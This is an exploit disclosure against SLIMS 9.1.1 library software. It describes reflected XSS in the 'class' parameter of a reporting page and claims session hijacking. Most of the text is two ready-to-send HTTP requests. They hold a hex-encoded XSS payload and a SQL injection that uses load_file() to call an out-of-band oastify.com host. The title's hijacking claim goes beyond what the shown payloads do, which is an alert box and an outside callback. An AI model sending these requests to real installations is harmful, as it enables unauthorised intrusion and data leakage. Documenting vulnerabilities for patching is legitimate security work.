## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image ## Author: nu11secur1ty ## Date: 12.17.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1 ## Description: The value of the `class` request parameter is copied into the HTML document as plain text between tags. The payload ytrrhz3nj2 was submitted in the class parameter. This input was echoed unmodified in the application's response. The attacker can trick some authenticated user to visit his page and give to him very sensitive information about the system. ## STATUS: HIGH Vulnerability [+] Payloads: 0.0 ```GET GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27 HTTP/1.1 Host: pwnedhost.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1 Connection: close ``` 0.1 ```GET GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27 HTTP/1.1 Host: pwnedhost.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1 Connection: close ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1) ## Proof and Exploit: [href](https://streamable.com/ibdulr) ## Time spent `01:30:00`